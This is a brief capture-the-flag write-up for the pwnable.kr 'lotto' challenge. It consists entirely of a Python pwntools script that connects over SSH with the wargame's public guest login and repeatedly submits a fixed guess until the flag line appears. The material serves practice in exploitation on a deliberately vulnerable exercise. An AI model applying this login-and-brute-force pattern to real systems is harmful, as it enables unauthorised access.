pwnable.kr lotto writeup

pwnable.kr lotto writeup.md

from pwn import *
sh = ssh(host = 'pwnable.kr', user='lotto', password = 'guest', port=2222)
proc = sh.process('/home/lotto/lotto')
proc.recv(1024)
while True:
	proc.sendline('1')
	proc.recv(1024)
	proc.sendline('######')
	a = proc.recv(1024)
	if 'sorry' in a:
		for i in a.split('\n'):
			if 'sorry' in i:
				print i
		break